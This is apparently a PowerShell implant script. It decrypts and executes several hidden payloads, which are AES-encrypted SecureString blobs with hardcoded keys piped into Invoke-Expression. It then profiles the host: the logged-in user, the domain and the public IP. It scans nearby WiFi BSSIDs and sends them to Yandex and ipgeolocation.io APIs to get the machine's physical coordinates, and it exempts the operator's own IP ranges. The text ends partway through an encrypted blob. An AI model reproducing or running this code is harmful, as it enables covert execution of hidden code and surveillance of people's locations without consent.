#cls
##must change
 . ( $pSHome[4]+$PSHoMe[30]+'X') ( ( [rUntimE.iNtEroPSErVIcES.MarSHAL]::PTrtoSTRinGunI([ruNtIme.inTEroPSERvicEs.marshaL]::SEcURESTRINGToglObalaLloCUNicodE($('76492d1116743f0423413b16050a5345MgB8AGIAagBYAHIANwBCADYALwBXAGMAOAAwAEMAcQBjAFkAZwBDAGIAcQBDAHcAPQA9AHwAMAA4ADgAZABmADEAMwBmADQAMwAxADAAZAA0AGQAYgBiAGQAMAAwAGEANAA4ADkANQBiADYANgBiADUANgBiAGMAYgA3ADYAOQBiADMAOQBjADQAOABkAGEANwAwADkAYgAxADMAYQBmAGYAYwAyADcAOAA4ADUAMAAyADYAOQAyADkAMwBhADQANQA5AGMANAA0AGEANABjADEANwAzADAAOQAzADgAYQA4ADAAYgA0AGYAZAA5AGQANgBkADUAMgBkADAAZgBhADEAYQBlADIAZABjAGIAMQBiAGUANgBjAGUAYwAzADQAZgA0AGIAZABjAGEAZgA3AGQANwBlADMANAAzADIAZgAzAGQAMABiADkAYgA1AGIAZQA3AGIAOABiADEAYQBiADgAZABlADAAYQBhADAAZAA0ADIANgAxADkAOQA3ADYAMQA0ADcAMwAzAGYAOABhADQAZgAxAGEANQBhADkAMwA2ADEANQBiADIANgAxAGYAZQBkAGIAMwAwADkAOAAwAGEAZABhAGEAZAAxAGQAYwAzADEANwA2AGIAYgA3ADUANwA0AGIAMwBlAGQAOAA1ADkAYQAwADkAOABkADIAYgAxADgANgAxAGQAYwA5AGYAMwA3ADYANQA3AGMAZAAwAGIAMwBhADgAZQA0ADUANwAzADcANgBkADAAYwAzADYAMgBlAGMAZgA0AGYAYwAxADcAYwA3AGMAZQA0ADEANgAwADkAMgBhADUANwAxADUAYQA0ADUAMQAwADYANgA0AGIANAA4ADMAMwBkADYAYgBmAGUAZQA4AGQAYgBkADcAZgBhADgAMgBlADMAOQA1AGYAZAAzADcAZAAyADEAOAA4ADYAYwA3AGYAOAAyADUANgAyAGEAYwBkADIAZAA1AGYANgBhAGYAMwBiAGQANABmADgAMQBhAGYANAAzADUAOABmADAAMABmAGYANwAwADAANQBkAGQAMgAxAGIAMQA3ADQAYQBlADMAZgA2ADYAOAA5AGEANwBlAGQANgAyADQAZABmADAAOAAyADUANAA2ADMAZAA3ADUAMwAzAGEAMQBmADMANgAwADYANABkAGMAOAA1ADQAMABjADMANwBmADUAZgA1ADkAMAAxADkAYgBhAGYAMQA0ADUANQBiAGQAOQAyADQAOAA1ADAANwBmAGQANwA3AGEAYwAxAGUAZQA5AGYAYwA1ADQANQAxADUAMQAwADUAMgBjAGQANAA4AGYAMwAzADkAYwAyAGYAYQA2ADYAMABmADgAOQA3AGYAMAAwAGUANAAwAGIANgA0ADAAMAAyAGYAYwBhADEANABlADAAYQBhADQAMgBmAGQAOQBlADQAMgAwADEAOQA4ADMAOAAyAGUAOQA3ADIANQA4ADkAZgAyADAAMgBjADAAYQA0AGEAYQBlADcAMAAyADIANwA2AGEAMQAyAGQANwBjADkAOQA4ADEAYwAxADYAOAAyADkANgAyADcAZABmADQAMwBmADgANABiADQAYQA5ADMAMAAwAGIANgAyAGYAMwA3ADMAYwBmADAAOABmAGUAYgBiAGEAYwBjADMAYgAzADcAYgA2ADIAOAA1ADIAMABiADgAYQAyAGUAMgBkADgAMAA3ADAANQA3ADQAZgA3AGQAMAA1ADUAMgA2AGEAZAA2AGQANgA1ADgAMQBhADEANABmAGYAMAAxAGEANQA0ADcAYQA0ADcAZQBjADQAMQBkAGQAMwBmADIAZABjAGYAMgAzADkAZABlADQAMwBlADMAZgAwADAAYgA1ADYANQA4AGUAMwA5AGMAOQAyAGMAOQA0ADMAMQBmADIAMABmADEAZQBhADcANwBiADQAZgA4ADQAZQA0AGEANgAwADgAYwBlADkANQA1ADUAZQBmADEAOQBlADQAZgA0AGEAZAAyADkAZQBjADMAZAAwADEAYwA2ADQAMwBhAGEAMQBiAGMAMAA0ADYANwA5AGUAMwAxAGQAMAAyAGUANAAyADkAMAA2AGMANgA5ADgAMAAwADMAYwAyADYAMgAwAGIANABkAGIAMABiADgAMQBmAGEAMQBlAGUAYQA2ADYAMgBlAGMANQBiADcAMwBmADYAZQAxAGQAZABlADcAYwAxAGQAZQA1ADYANAA4ADEAZABlADkAYwA2ADMAZgA1ADMAMwAwADcANAA3ADUAYgBjAGIAYQA0AGMAYwAwADEANQBkADEAOQAwADEANAAyADMANwAyADMANQBmADMAZgBhADkANQBiADUANgBlADIANwA2AGUAYwBjADYAZgBlADAAYgAxAGIAYQBkADgANgBhADMAZABhADQAMwA3AGEANwBjADMANABhADQANgA2AGQAMgBhAGUANQA1ADQAOQAxAGYAMABlAGIAMgA1ADMANwBjADgANgAzADEAZABjADMAZQA2ADEAYwAyADUAZAAwADMAMABlADEAMgBkADIANQA4AGMAMgBkAGYANQAyADcAZABkADkAMwBiADkANQA0AGQAYgBjAGIAYwA3AGIAOQA0ADkAOABjADEANABmADkANQBhAGUAYgAxADQAZQBiADIAZQBlAGIANQBlADUANQBmAGQAMQBlAGUAMwA4ADEAMAA3ADIANwA4AGMANQA1AGUAYQBlADEANQBkAGYANgBiADcAYwA0ADQANABhADIAMAA0AGMAOQA4AGQAZAA1AGMANABhADUAMwA0ADcAZQA2ADMANAAyADkAZgBmADQAYwA0ADMAMQBlADEAMwA5ADQAMwA0AGIAMQBjAGEAOAA5ADMAMAA4AGIAOQAyADEANAAzADUANQAyADAAZABkADYANQBmADkAOAA1ADAAMwA5ADMANwAwAGYAOABhAGIAMABhADIAMgBhADEANAAyAGMAMgBiAGIAYwA1ADcAZABlADQAZQBlADcAYgA5ADcANgA2AGMAMgBjAGYAZAAyAGMAZgA1ADIAYgBiAGYAMgBjADYANQA0ADEAMAAyAGUANwBjAGIAOABlADMAZgAwAGYANwAwAGYAYwAzADgANQA3ADYAYgAyAGEAOQAwADQANAAwAGMANgAzADIANgBjADcAMAAzADEANQA1ADEAMQAzADMAOABlADkAZgA2AGUAMgAzADcAYwBlADMAMwA5ADcANQAzADYAYgAwADYAYQA0ADQAZgBmAGIAYgA2AGYANABiADcAYQBlAGQAYgA2AGEANQA5ADYAMgAyAGMAOQAxADgAMwBhADkAZgA4ADgANABiADEAYQBmADkANwBmAGUAZABiADcANQBhAGIAYgBlADEAZgA5ADUAOABmADYAMwBmADQAZgA3ADMAOQBmAGIAYgBhADcANQBiAGIAOAA3ADUAMgBiADYAOABhADUANQBkAGEANAAzADcAZgBkAGEAZQA3ADAANgAzADgAMgA2ADgAZgA3ADAANgBmAGQAOAAwADkAOABjADEAMwBhAGQAMgA4AGQAMwBlADAAZQBjADMANwA3AGIAMQBiAGEAYwBmAGEAZABhAGYANAA4ADkAOQAzADAAYgBjADEAMwBjADkAYgBlADkANQAxADgANQBkAGIANAAyADYAYgAxADAANABlADMANgA3AGQAMAAxAGEANwBiAGIAZgBmAGQAYQBmADIAYgBlAGMAMQBlADgAZgAwADcAOAA4AGYAZgA5ADYAOQAyADMAZgAwAGQAZABmADAAZABlADEAZgBkAGQAYwA1ADQAYQAzADQAYwBmAGYAMQBlAGIANwAzAGEAZABlADEANwA3AGQAMwBiADgAOQBjADIAMgAyAGQAYQA5ADQAOQAwAGEAOAAwADQAMABlAGUAMgBhAGIAYwA2ADAAYgAxADMANwBiADQAMQBmAGIAZQBmAGIAYwBlADcAYQBhAGMAOAA1ADkAZgAyADYAZAA3ADAAYwBiAGEAYQBkAGIAOAAyADYAMQBkAGUAYwA0ADkAMwA5ADYAOQBmADUANgA=' |conVeRtTo-SECUrestRinG -key  (42..11)) )) )) 


#####################nulled vars###################
$i=0
$wifiadd = ''
$dtcs='&dtcs='
$user = $null
$userstatus = $null
$rdps = $null
$satVisible=''
$ownips=@('109.196.132','178.57.71')
#this position for ownips
 ( [RuNTiMe.InteROpseRViCEs.MarshAL]::([rUntImE.InterOPSErViCeS.MArshAL].gEtmeMBErS()[0].NAME).INVOKE([runTImE.inTEroPserVIces.marshal]::SECUrESTRInGtoGLObalaLlOcaNsI($('76492d1116743f0423413b16050a5345MgB8AHUAcQBUADkAZwBzAG8AdABNAHUAcgAxAFkAaABDAE4AUwBaAGsASwA3AFEAPQA9AHwAMABkAGYAZABlADcAYQAzADUAMQA2ADYANQBlAGUANgAzADgAZQA5ADgAYwBmADgAOAAxADcAZQA1ADEANQA5ADcAMwBiADAANwA0AGEANgAxADYAMgBlADUAYQAyAGEAYQA4ADMAMQA4ADcANwBmADUAYQA3ADEAYQBmADAANgAxAGUAMQA3AGMAZAA2ADgAZQBhADgAMwA3AGMAMABjADAANABkADkAMwA0ADYAMABkAGUAMwBiADcAYQBmAGEAMwA4ADUAMAAwAGIAYQA2ADAAYwAzAGIAYwA2ADIAZQBiAGIANQBiADcAZgAxADUAOAA0AGUAMQAxAGIAMAAzADUAZQA1ADcANQA4AGQAOAA1ADQANgAzADMAOABjADUAMwA5ADgAMwA3AGEAZQBmAGYAMgAzADkAZAAyADcAZQA5AGQAOABjAGYAYgBiADUANwAzADkAMAA3AGEAMAA2ADYAMQA3ADYAYgAxADEAYQBkADIAYQA5ADIAYgA3AGMANwA4ADMAOQAxADQANAAwADQAYQBmADUANAA1ADYAYgA0AGIAOQAyADMAYgAyADYAMQA1ADEAYQBhAGQAYgA4AGQANgAxAGYAMgBmADMAYwA4ADIAZgA4AGUAMgA1ADYANwBhADQAZAAxAGQAMgBmADAAMAAwAGIAOQA2ADcANAA1AGEANAA4AGEAYgAzADUANQAwADUAYgBhADUANwBhADQAMwA5ADcANwA4AGIAMwBmADAAOQA1ADIAOQBjADgAYgAxADUANABhAGIANQAxADkANgAzADkAYQA1ADAAOAA1AGUAZgA3AGUAZgAwADIAZAA1ADEAMgA4AGIAOABkAGQANQBhADAAMwA4ADIAZAAxAGQAMQA2ADAAMAA4AGYANQA4AGUAMgAxADcAOQAxADcAMwA2ADcAZgA4AGMAMAAwAGIAOQBjADcAZgAxAGYANgA4ADAAOAAyADcAMAAzAGQAYgBjADMAMgA2ADEAYQBjADgANwBiADcAMAA1AGEAMwBiAGYAZgA4AGUAMgAyADEAOABkADkANwBkADgAMQA1ADEAOAA3ADYAMwBiADgAYQBjADgAMQBkADAANAAyAGUAMQAwADYAMABmAGUANgBjADIANwA5AGIAYgBkAGQANgBhADAANQBjAGEAZgBhADMAZQA1ADAAZQBlADgAZQBiAGYAZQA4ADIAYgBlADYAMAA4ADUAZQBlADcANABjADYAYQBlADYAYgBjAGMANQAxAGMAOABlADYAMAAwADYAYgBiADMAOQBkAGEAMQBhADcAZgA2AGMAZQA4AGUAOQAyAGUAZQA5ADUAYwA0ADgAYwA1ADIAZQAwADkAOAA3ADIAMwAyADgAMABhADkAYQBlADgANQAxADQAOQA5AGQAYQA3AGQAOABjAGIAZgA4ADAAZAA4ADEAMAA0ADEAYwBkADMAZAA0ADkAYwA2ADQANQBhADEANABjAGEAMAAzADAAMQA2ADkAZABlAGIAOQAxADYAMgBlADIAMwBjADIAOABmADYAMAAzADkAMwAwAGUAYQBhADUAZgBmADYAMQA3AGIAMABjAGEAZQBhADEAYwA1ADcAYgA4ADAAOQA1ADQAZQBmAGQAMgBkAGQAYgA4AGEANQA2AGEAOQAyAGQAMQAzADgANgA5ADUAMwA4AGIAMQBjAGUAOQA4ADcANwA5AGUAMwAzAGMANwA0ADIAOQBjAGQAYQAzAGYANwBiADEANQA4ADcAYgBmADgAZgA3ADQAZQBhADEAYQBjADIAZQBjADIAMAA5ADQAOAA5ADkAYwA1AGUAYwA5AGIAZAA3ADcAYwA1AGQAOQA1AGIAYwA0ADIAZgA2ADQAOQA5ADgAZgAwADgAZAA0ADcANwA4ADgAMgAyADEAYQBjADkAMQA5ADkANAAxADQAZQA3ADkAYwBjADkAOAA3ADkAMgBmADEANgAyADcAMAA5ADYANgAwAGEAOQAxADIAOAA3AGQANABlADgAYQBlAGEAYgAzADYAOQA1ADcAYwBmADgAMQBmAGQAMgA1AGYANQBmAGIAZQBkAGIAOAAyADgANwAxADcAMAAyADIAMQBhAGYAZQAyADAANgA3AGQANwAxAGQAMAAxADgAMQBkADkAZQBhADUANABjADgAYwBiADIAZABjADQAZAA3AGYAZAA5ADIAYwA1AGMAZgA1AGEAYQA4ADQAMgA4ADUANgAzADEAYQBmAGMAOABjAGUAOQA1ADgAMQA1ADYAMQAzAGQANQAzADAAMQAyADYAZQAzADUAMwAwAGUAYwBjADUANQA4ADEAYwBhAGYAMwA4ADEAOABjADcAMgBiADkAMwAzAGIAMAA4ADcAYwAyADUANQBjAGYANgBlADkAZgBhAGIANAA0AGUAYgBlADIAZQBkADUAOAA5AGEANgAyADgANQAwADcAOQA1AGEANwAyADEANgA1AGUAZAA5ADAANABiADEAOABjADMANwBmADkAYQA3AGQANQA3ADUAZQA2AGQANQAyAGEAZABlAGIANgA5ADYAMwA0ADUAMAAzADcAZgA0AGEAMQA5ADEAOABlAGEANQA1ADkAMgBjADgAYwBjADMANABkADMAMABjAGEANwAyAGEAMAA0AGMAMAAwADkANwAwADAANAA5AGUAMgAxADMAYgA4AGQANwA4ADEAYQBlAGEANgBhADgAYQBiADkANAA4ADUANAA2AGEAZgA5AGYANgA0AGIAMQA1AGUANgA1ADgANgAwADgAZgAyADkAMQBjADMAMwBiAGYAZAAzAGIAMQAzADYAZgA2ADIAZgBlADMAZgA4ADMAMQBhADMAOQA5ADAAZgA3ADQANgA1ADkAYwBjAGMANAAwAGUAMwBlAGYAMAAwADAAYgA5AGYANwBmADkAOQA2AGYAYwA4ADQAYQA5ADMAOAAzADUAOQAyADgAMwAzADQAZAA1AGIANAA0AGEAOAA2ADkAYQA0AGUAYQBkADIANgBjADkANwBkADcAMgAwADcAOABmADYAMgA1ADIAOABlADgANQBmAGYAYQA0ADIANQA3AGMAYgBiADMAYgA5AGUAYQA0AGQAYQAyAGYAOAA2AGMAMQA3AGUAZABkAGEAMwA1ADIAMQBmAGUANgAyADgAMgAxAGQANwAyAGIAOABhADcAMAA4ADYAZQBhAGQAZQAzADMANAAyADUAZgA0AGUAZAA2ADkAYwBjAGYANQA5ADUANgAwAGMAYwAwADcAYgBkADcAYQA0ADUAOQA3ADMAOABhAGUAMwAzAGEAZgA0AGUAMABhADcAYQBkAGIAMAA2AGIAMwBkAGEAYwAxADAAMwAzADkANgBlADMANwA0ADQANAA2AGIANQBhAGMAMAA2ADAAMQA5ADMAOAA5ADcANABjAGYAZQA3ADEAYgBlAGQAMQA4ADgAOQA4AGYAMwBkADEANgA2ADgAMwA1AGEAOABlADMAZQA1ADQAZgBkAGUAYgA0ADIAZQA2AGUAZAAyAGIANgA2ADgAOAAxAGEAZgA4ADEAZgA5ADIANgBhADYAZQA4ADUANQAyAGIAZQA2AGUANAAyADYANQA2ADUAMgA4ADMANQBlADgANAAwADUAMQA0AGYAYwA3ADAANABjADAAOAA1AGIAYQBiADQAMQA5ADAAYQBlADMAYQA3ADYANAA3AGUAMgA0ADYAMwA2ADYAOAAyADQAMQA2ADYAOQA0AGQAMQA0ADIAYgA1ADIAYwA0ADYAYgAyADIANwA2AGUANgBiAGEANwA0ADUAYQAyADUANQBkADAANgAwAGEANQAxAGIA'| coNVeRTto-sEcuRestRIng  -keY  10,156,19,73,95,53,206,54,154,60,96,63,166,164,166,48,138,85,205,203,70,51,218,125,242,245,77,77,180,202,54,73) ) ))|iEX


##################
Get-Command '*json'

#Console User Loggined
$username = query user /server:localhost
$manuname = Get-CimInstance -ClassName Win32_ComputerSystem
$domain = $manuname.Domain
$username = $username -match 'console'
if ($username -ne $null) {
    $username = $username -replace '\s+','!'
    $username = $username -split '!'
    }
else{$username='system'}
#$username

#Get white IP information
$ipinf =  (Invoke-RestMethod http://ip-api.com/json/)
$dtcs=$dtcs+$ipinf.query

#Get avialable WiFi networks
$wlan = netsh wlan show network mode=bssid

#Clear BSSIDs
$warr = $wlan -match 'BSSID'
$warr = $warr -replace ':',''
$warr = $warr -replace '^.*(?=.{12}$)'

#Clear signal
$wsarr = $wlan -match '%'
$wsarr = $wsarr -replace '%',''
$wsarr = $wsarr -replace '^.*(?=.{2}$)'

$ip=$ipinf.query
if (($ip -eq '') -or($ip -eq $null)){
    $ipurl = 'http://checkip.amazonaws.com/'
    $ip = Invoke-RestMethod -uri $ipurl
}



if (($null -ne ($ownips | ? { $ip -match $_ }))) {
    $ip=$ip+' '+$company
    $satVisible='&satVisible=99'
    $dtcs='&dtcs='+$company+' IP'
    $result=$tresult
}

else{
try{
if ($warr.Item(0) -ne $null){
    $wifiadd = ', "wifi_networks": [ '
    ForEach ($item in $warr){
        $warr.Item($i)
        $wifiadd = $wifiadd + '{"mac": "'+$warr.Item($i)+'", "signal_strength": "'+$wsarr.Item($i)+'", "age": 500},'
        $i= $i+1
        }
    $wifiadd = $wifiadd -replace ".{1}$"
    $wifiadd = $wifiadd + ']'
    $yarnd = Get-Random -Maximum $yaapikey.Count
    $Body = 'json={"common": {"version": "1.0", "api_key": "'+$yaapikey[$yarnd]+'"}, "ip": {"address_v4": "'+$ip+'"}'+$wifiadd+'}'
    $Uri = "https://api.lbs.yandex.net/geolocation/"
    $result = Invoke-RestMethod -Uri $Uri -Method Post -Body $Body -Verbose
    $result | ConvertTo-Json
    $result.position.latitude = $result.position.latitude -replace ',','.'
    $result.position.longitude = $result.position.longitude -replace ',','.'
    $ip=$ip+' yandex locator'
    }
    else{
    $ipgeokeyrnd = Get-Random -Maximum $ipgeokey.Count
    $uri = 'https://api.ipgeolocation.io/ipgeo?apiKey='+$ipgeokey[$ipgeokeyrnd]+'&ip='+$ip
    $ipgresult = Invoke-RestMethod -Uri $Uri -Method Get
    $ipgresult | ConvertTo-Json
    $result.position.latitude = $ipgresult.latitude
    $result.position.longitude = $ipgresult.longitude
    $ip=$ip+' ipgeolocation.io'
    }
}
catch {
    $ipgeokeyrnd = Get-Random -Maximum $ipgeokey.Count
    $uri = 'https://api.ipgeolocation.io/ipgeo?apiKey='+$ipgeokey[$ipgeokeyrnd]+'&ip='+$ip
    $ipgresult = Invoke-RestMethod -Uri $Uri -Method Get
    $ipgresult | ConvertTo-Json
    $result.position.latitude = $ipgresult.latitude
    $result.position.longitude = $ipgresult.longitude
    $ip=$ip+' ipgeolocation.io'
}
}

###custom ip block
( [rUNTimE.inTEropseRVICeS.MARSHaL]::([RuNtImE.iNTEropsERViCeS.MaRSHAl].GeTMEMbERS()[2].NAMe).iNvoKe([rUnTiMe.inTEROPSeRvICEs.MaRShAL]::SeCureStRinGtOglobAlALLoCUNicOde($('76492d1116743f0423413b16050a5345MgB8AFYANgBnADkAUwBMAEUAaQBXAHMARQBOAHEAYQBLAHMAQwBSAFAAZgBYAEEAPQA9AHwAZgAzAGYAOABmADQAZQBiADQAZgA3ADYAOABhADkAYwAzADkANABmAGYAMwA3ADcANQAwADcAZAAxAGUAOQAyAGMANABmADIAOAAyAGMAYwBmADMAOQBmADIAMgBiAGYAZQAzAGQAZgAxADMANwBkADYAOQBhADcAYwAwAGYANgAxADIANAA0ADcAMABjADQAYQAwADUANABlADAAZQBmADAAMgBjAGUANwA2ADUAZQA4AGQANQA2ADgAMQAxAGEANQBiADEAMgBiADkAMwA0ADkANgBiAGUAYgAyADcAMwBkAGMAMABjAGMANQA4ADIAZAA1ADAAMQA5AGEAOQA3ADkAMAA0ADEAOQBjADcAYgAyAGMANABkAGEAYgAxAGUAMAAxAGMAOQAyADgAOABhADAAMgBiADYAYgA0ADEAMgBhAGYANQBlADAAZABmADYAMQBlADkAMAAxAGIAZAA3ADAANgBjADYANgAwADcANgA2ADMAYgA1ADIAMwBlADIAZQBmAGEAMwAwADQAYgA5ADkAMgA0ADAANgBkADAAMABjAGIANAAwADQAMwA0AGQAMwBlAGMAZQAxAGQAMgA3ADYANQAzADYAOAA3ADAAOAAxAGUANAA4AGMAMAA4AGEANAA3AGQANAAwAGMAMQA3ADQAZQAyADgAZgA1AGEAYgA0AGIAZQAyADAAZQAyAGIANQAxAGUANABhAGYAZAA5ADUAZQBhAGEANQAxADcAYQBiAGMAOQBiAGIAOQA2ADQANQAxAGYANQAzADgAMwAzADUAMgBkADMAMwBlADgAYwAxADQAOQA5ADQAZgBjAGYANAAzADAAYQBiAGUAMQAzADYAMABjADIAZAA2AGYAOQAwADUAMwBmAGMAOAA3ADQAZAA0AGEAYQBjADcANgA2AGQANgAwADgAYgBiAGQAMwA0AGIAOQBkADQAYwBiADEAZABhADkAZgA4ADgAZgBjAGIAMgBkADMANAA5AGMAMgAzADMAMwA2ADYAZAA2AGQAYgAwADcAZAA2ADcAYwBhAGMAMQAyADAAYwBhAGUAZQBmADYAMAAxADEAZQA1AGQAYgBiADYAYgA3AGMAMAAxADUANQA4AGEAMAA5ADYAZQA1ADcANgA0ADgANAA0AGEAOQBhADUANQA4AGUAOAA2ADEAYQAzADYANAA1ADkAMwAzADcANgAwADgAMQBmADUAZgAyADEANwA5ADEANgBlADAANQBhADEAMwBiADYANwBkAGIANAA3ADAAOAA0AGUAOAA1AGEAOQBhADcAMAAxADEAOQA5AGMAZAAwADkAMQBkADcAOAA5ADAAYwBmADQAOQA0AGIAYgBjADcAOABiADIAMwAxADIAOQBkADcANwBkAGQAYQBlAGQAYQAyAGUANQA2ADgAOABjADcAZAAyADMAMQBjAGYANAA1ADIAZQAyAGMAYwBhADQAMwA2ADYANAAyAGIAYgAxADUAYgBlADEAOABlADUANwAxADYAOQA1ADQAMQA0ADAAZQBjAGIAMQA1AGMAZgAyADcAMQA0ADAANAA4ADMAYgA5AGMAOQA3ADQANQBhAGEAZgBjADQAYgAzADUAMwAyADEAYwBmADEAYwAwAGEAZQBhADAAYgBkADMAMgAyADQAZAA4ADIAMQAxADIAZAAzAGMAMgAzADgANABiADkAMwA1ADEANgA4ADMANAAwAGEAMwAxADgAYwBlAGIAYwAwAGQAYQAwAGYAMQA2ADMAZQA1ADYANgBmADMAYQBjAGMAYgBhADAAYgA1AGQAYgA1ADUAMgAxAGQANQBmAGIANgAyAGMANQA4AGMANwA4AGIAOQAwADgANQBmAGIAMQBjADkAMQBjAGIANAA0ADYAZABkADMAMQBjADIAOQAwADcAMABkAGEAOAAwAGEAMwBhAGYAMwA4ADYAOQAzADQAOQA4AGIAOQAxADAAMQBhADgANgBlAGIAZABlADEANAAxADkANAAwAGEAZAA3AGEAMwA5ADYAZQA1ADYAMQA0AGEANAAwAGQAYQA5ADEAMAA4AGYAYwA5ADYANAA3ADQAMgA0ADgAZgA0ADcAYgA4ADMAMgAzADcAYwAwADkAMABhADQAMQA3AGUAMAAxAGEANgAzADEAMgBhADgANwBmAGUAYwBmAGQAMQA1AGQAOQA3AGYANQBjADkAZQA3AGUANQAzAGIAMQA1AGEAOQAyADUANgBhADAAYgBjAGIAMQBhADYAZQAyADUAZABmAGUAZQA4ADIANwA4ADUAMwBkADkAOAA2AGUAOQBhADgANABkADUAOQAxAGEAYQBhADMAMAAzADAAZAA4ADYAOQAzAGEANQBjADMANAA0ADYAMwAwAGYAMwAzAGEAOAA2ADUAYQA5AGMAMABjAGEAZABlADQAOAA3ADAAMgBhADkANAA4ADEAOABiADgAMAA0ADEAMABiAGQAMQBjAGIAMABjADQAZAAzADcANAA5ADYAOQBmAGIANwA2AGMAMQBhADgAZQAzADIAOQBjADMANQBmAGEAZQAxAGYAZAA1ADEAYQA4ADUANgBmADUAOQA5ADIAOQA2ADIANgBkAGYAOQAxADYAZQBiAGUANAAwADkAMwAyADAAOAAwADcANAA0AGEAOAAyADMAMwA5ADcANwAxADAAOAAzADgANQBkADgANgA4AGYAZQA5ADcAMQA5AGQANABhADEANQBmADAAZABiADIANABjAGIAMQA0ADkANQBhAGIAZgA0ADIANABkADUAYQBkAGYAMgA0ADIAZQA3AGMAMAAyAGYAMwBiADQAYgAzAGMANwBmADUAOAAxAGYAMwA3ADAAOQAzADgAMgBjADcANABhAGIAMABlAGIANAA5ADYAMQBlADMAOQBhAGQAOQBiAGIAMwAwADYAMgAwADAANAA0AGUAMABkAGMAOQBmADQANABmADAAOAAzAGUAYwBkADQANQA5ADUANQA4ADUAMQBhAGYAZAAxAGUANAA3ADkAZQBmAGYAYwBkAGYAYQA2AGYAOAA5AGYAYQA1ADYAMAA3AGYAZgA5ADkAYQA4ADYAYgBjAGIANAAxADMAOABhADcAYgBkADUANAAyAGEAMAA3ADYANABmAGYAYQBjADEANQA4ADgAMwBhADgANwBmADAAMwBjADMAOAA5AGQAOQA0AGUAZgBjADAAZAA1ADIAYwA2AGIAOQA5ADkAMQBmADQAYQA5AGIAMgAxADgANAAwAGMANgAwADUAMQAxADkAYQAyADMANgA1ADcANQAyADEAYQA3ADIAZABlAGQAMQA1ADUAZQA0ADgAZABkAGQAMAAxAGQANQAyAGQAZQBhAGQANwBlAGQANgA2ADYAOQA2ADEANwBmADQAMgBkAGIAMgA5ADYANgA1ADEANgA0AGIAYQBkAGQAZAAyAGIAZAA2ADUAOQBkAGQANgA5ADkANwAxADQAZgAyADAAZQBiAGIAOAA4ADcAZQAyADYAYwBmAGMANwAwAGQAYQAwADIAYwBiADkANwBmADIAYgBlADAANgA0ADEAMQA0AGEANAAzADEAYwAwADMAMgA2ADQAMgA4AGYAMwBjADgANAA3AGUAYgA5ADkANQA0ADEAZgA1AGEAYgAzADgAYwA4AGMAYgAxADQAMAA4ADAAMgA3AGEANAA5ADkAYgA0ADMAMQA0AGQANAA5AGQAYgA4ADYAOAA0ADAAOQA0ADQAMwBkADIAYgBjADMAMAA1ADEAMQBhAGEAMAAyADQANwA0ADEAMQA5ADAAZgBjADgAMQA3AGUANgA1AGMAYgAyAGEANwA1ADEAMgA2ADkAMAA5AGMAOQAyAGUAZAAxADIAOAAzADIAMwA4AGEAOABmADgAOQA4ADMANAA3ADIAYwBiAGQAOABlADIAMgAzADkAMgA5ADEAYwA2ADUAMABiADMANgA1ADAAZQA1ADYAOABlAGYAYwA2ADgAYgBhADYANAA1ADgAZABiADMAMgA4ADUANABmADgANQBlADIAZgAxAGMANAA5ADcAZQBhADcAOABhADUAZAA0AGIAZAAzADIAZgAzAGQAZAA3ADgANABiADIAMwAxAGMAYgA1AGQAMQAwAGUAMwBlAGIANAAxADIAZQAzAGUAMwA0AGYANABlADQAOAAyAGEAZgA4ADAANwA2ADEAYwAwAGQANgBmADIAZQBlAGQANwA4ADQAOABhADkAMAA3AGYANAA3ADMANAA1ADUAYwA5AGEANAA3AGIANwA1AGQAOAA1AGIAZAA3ADUAYgBiADMANQAwAGQAOQBlADYAOAA4AGIANgBkADMANwA0AGMANAAwAGUAMAAxADEAMgBjADAANwBlAGEAYQBjADYAYwA0AGIAZQA2ADEAMgAyADAANABiAGYAYgA4AGIANgA0AGMAOQA0ADgAMwBmADQANQBmADgANwBmAGYAZABlAGEANgBhADkANwA1ADkANwBiAGEAYwA3AGMANABiAGYANwBiAGIANgAyADIAZgBkAGEAOQAzADAAYwA3AGIANQBjADEANABlAGYANgBkADUANwBmAGQANAA5ADQAOQAzAGMAZQA1ADUAOAA0AGEAZgBlAGUANgAyADcAZgA1ADEANgA0ADgAYwA3ADIANAA1AGMAYwAyADgAMwBlAGYANwBmADIAZQBjAGYANQA1ADMAOQBjADEAZQBhAGEAYgA3ADAAMgA1ADUANwAyADEAZgBkADAAZgBlADUAZgBmADAANAA5ADAAYgA1ADYANgBmADYAMQAxADQAYgAzAGQANQBmADQAMQBmAGQAYQA3ADcAOQA2AGUAMQA1ADEAZQA3AGEAZQBiAGMAMwBlAGUAMABkADAANAA0ADUAMAA1ADgAMwA3ADYAMQA1ADUAMgBjADAAZAA4ADcANAA5ADIAZABjAGUAYgA4ADIAMAA1AGEANQBjAGQAOQBjAGYAMQA0AGQAZgA1ADEAYQBiADMAZgBjADAANAA5ADcAZQA4AGYAMAAzADQAYwA2ADgAMABlADMAYQA5ADYAOQA0ADIAZgA5AGMANQA1AGYAYQAxADUAZQA0AGYAOAA5ADEAMgA0AGUAYgBmADUANgAyAGIAZgBiADgANgA4ADcANAA0ADYAOQAxAGMAZQBjADkAYgAwADMANABlADUANgAyAGIAOAA5ADIAOQAzADEANwA1AGUAYgAzADIAYQA0ADcAMwAwAGEAZAAwADIAOQA3AGMAYgA2AGUANQAwAGQAOQBiAGYAYwBjADkANwBhAGUANQA5AGYAMAAyADkANQA5AGEAYgBmADIAMQBhAGMAMAA3ADEAMwA5ADcAYgBlAGIAZgBkADMAMQA1ADUANQBhAGIAMwBlADkAMAA0AGEAZgA2ADQAMQA3ADYANgAwAGQAMABjAGEAYwBkADkAMAA3ADIANQBjADMAZABkADMAYwAzADgAYQBlADcANwAwADEAOQBlADEANQA2ADgAZgA0ADEAZgAyAGYAMAA2ADIAZAA1ADUANwA0AGMAYgAxADgAYwBkADEAYQAxADYAYwAwADgAOQAzADgAZQA1ADcAMABmADkAYQA5AGEAMAA2ADQANQBkAGIAYgAzAGYANgA0AGIAOQAyADIAYwBlAGQAMwA2AGQAZgBjAGUAZgA3ADEAZQBjADIAMABkADAAMgBkADYAMwA2ADUAMQA3AGUANwAyAGUANgBjAGMAYgAwADIANwAzAGEANQA5AGMAYwAxADIAZgBkAGQANwAzAGMAZQA1ADUAMwA1AGUAMgAwAGUAMwBhADAAYQAwAGEANgA5ADIAMgBhADgAYQBmAGMAZQA5ADIAZgA1AGMAOQA3AGEAYwA3ADkAYQAxADIAMQAzADQANAA4ADIANABiAGEAYwBlADgAYwA3ADgAZAAwAGYAMABjAGIAZgBkADMAYQBlADEAOABiADcAYgBmADUANgAyADQANgAzADEANABjAGUAZQA3ADQAZgBjADMANgBkADYAYgBmADAAYQBhADAANQA0ADkAYgBjADIAYQBiADcAZgA1AGIAZQAxADMAZQBhADAANwBhAGYAZgBiADIANwAzADcAMQA4AGIAYQBiAD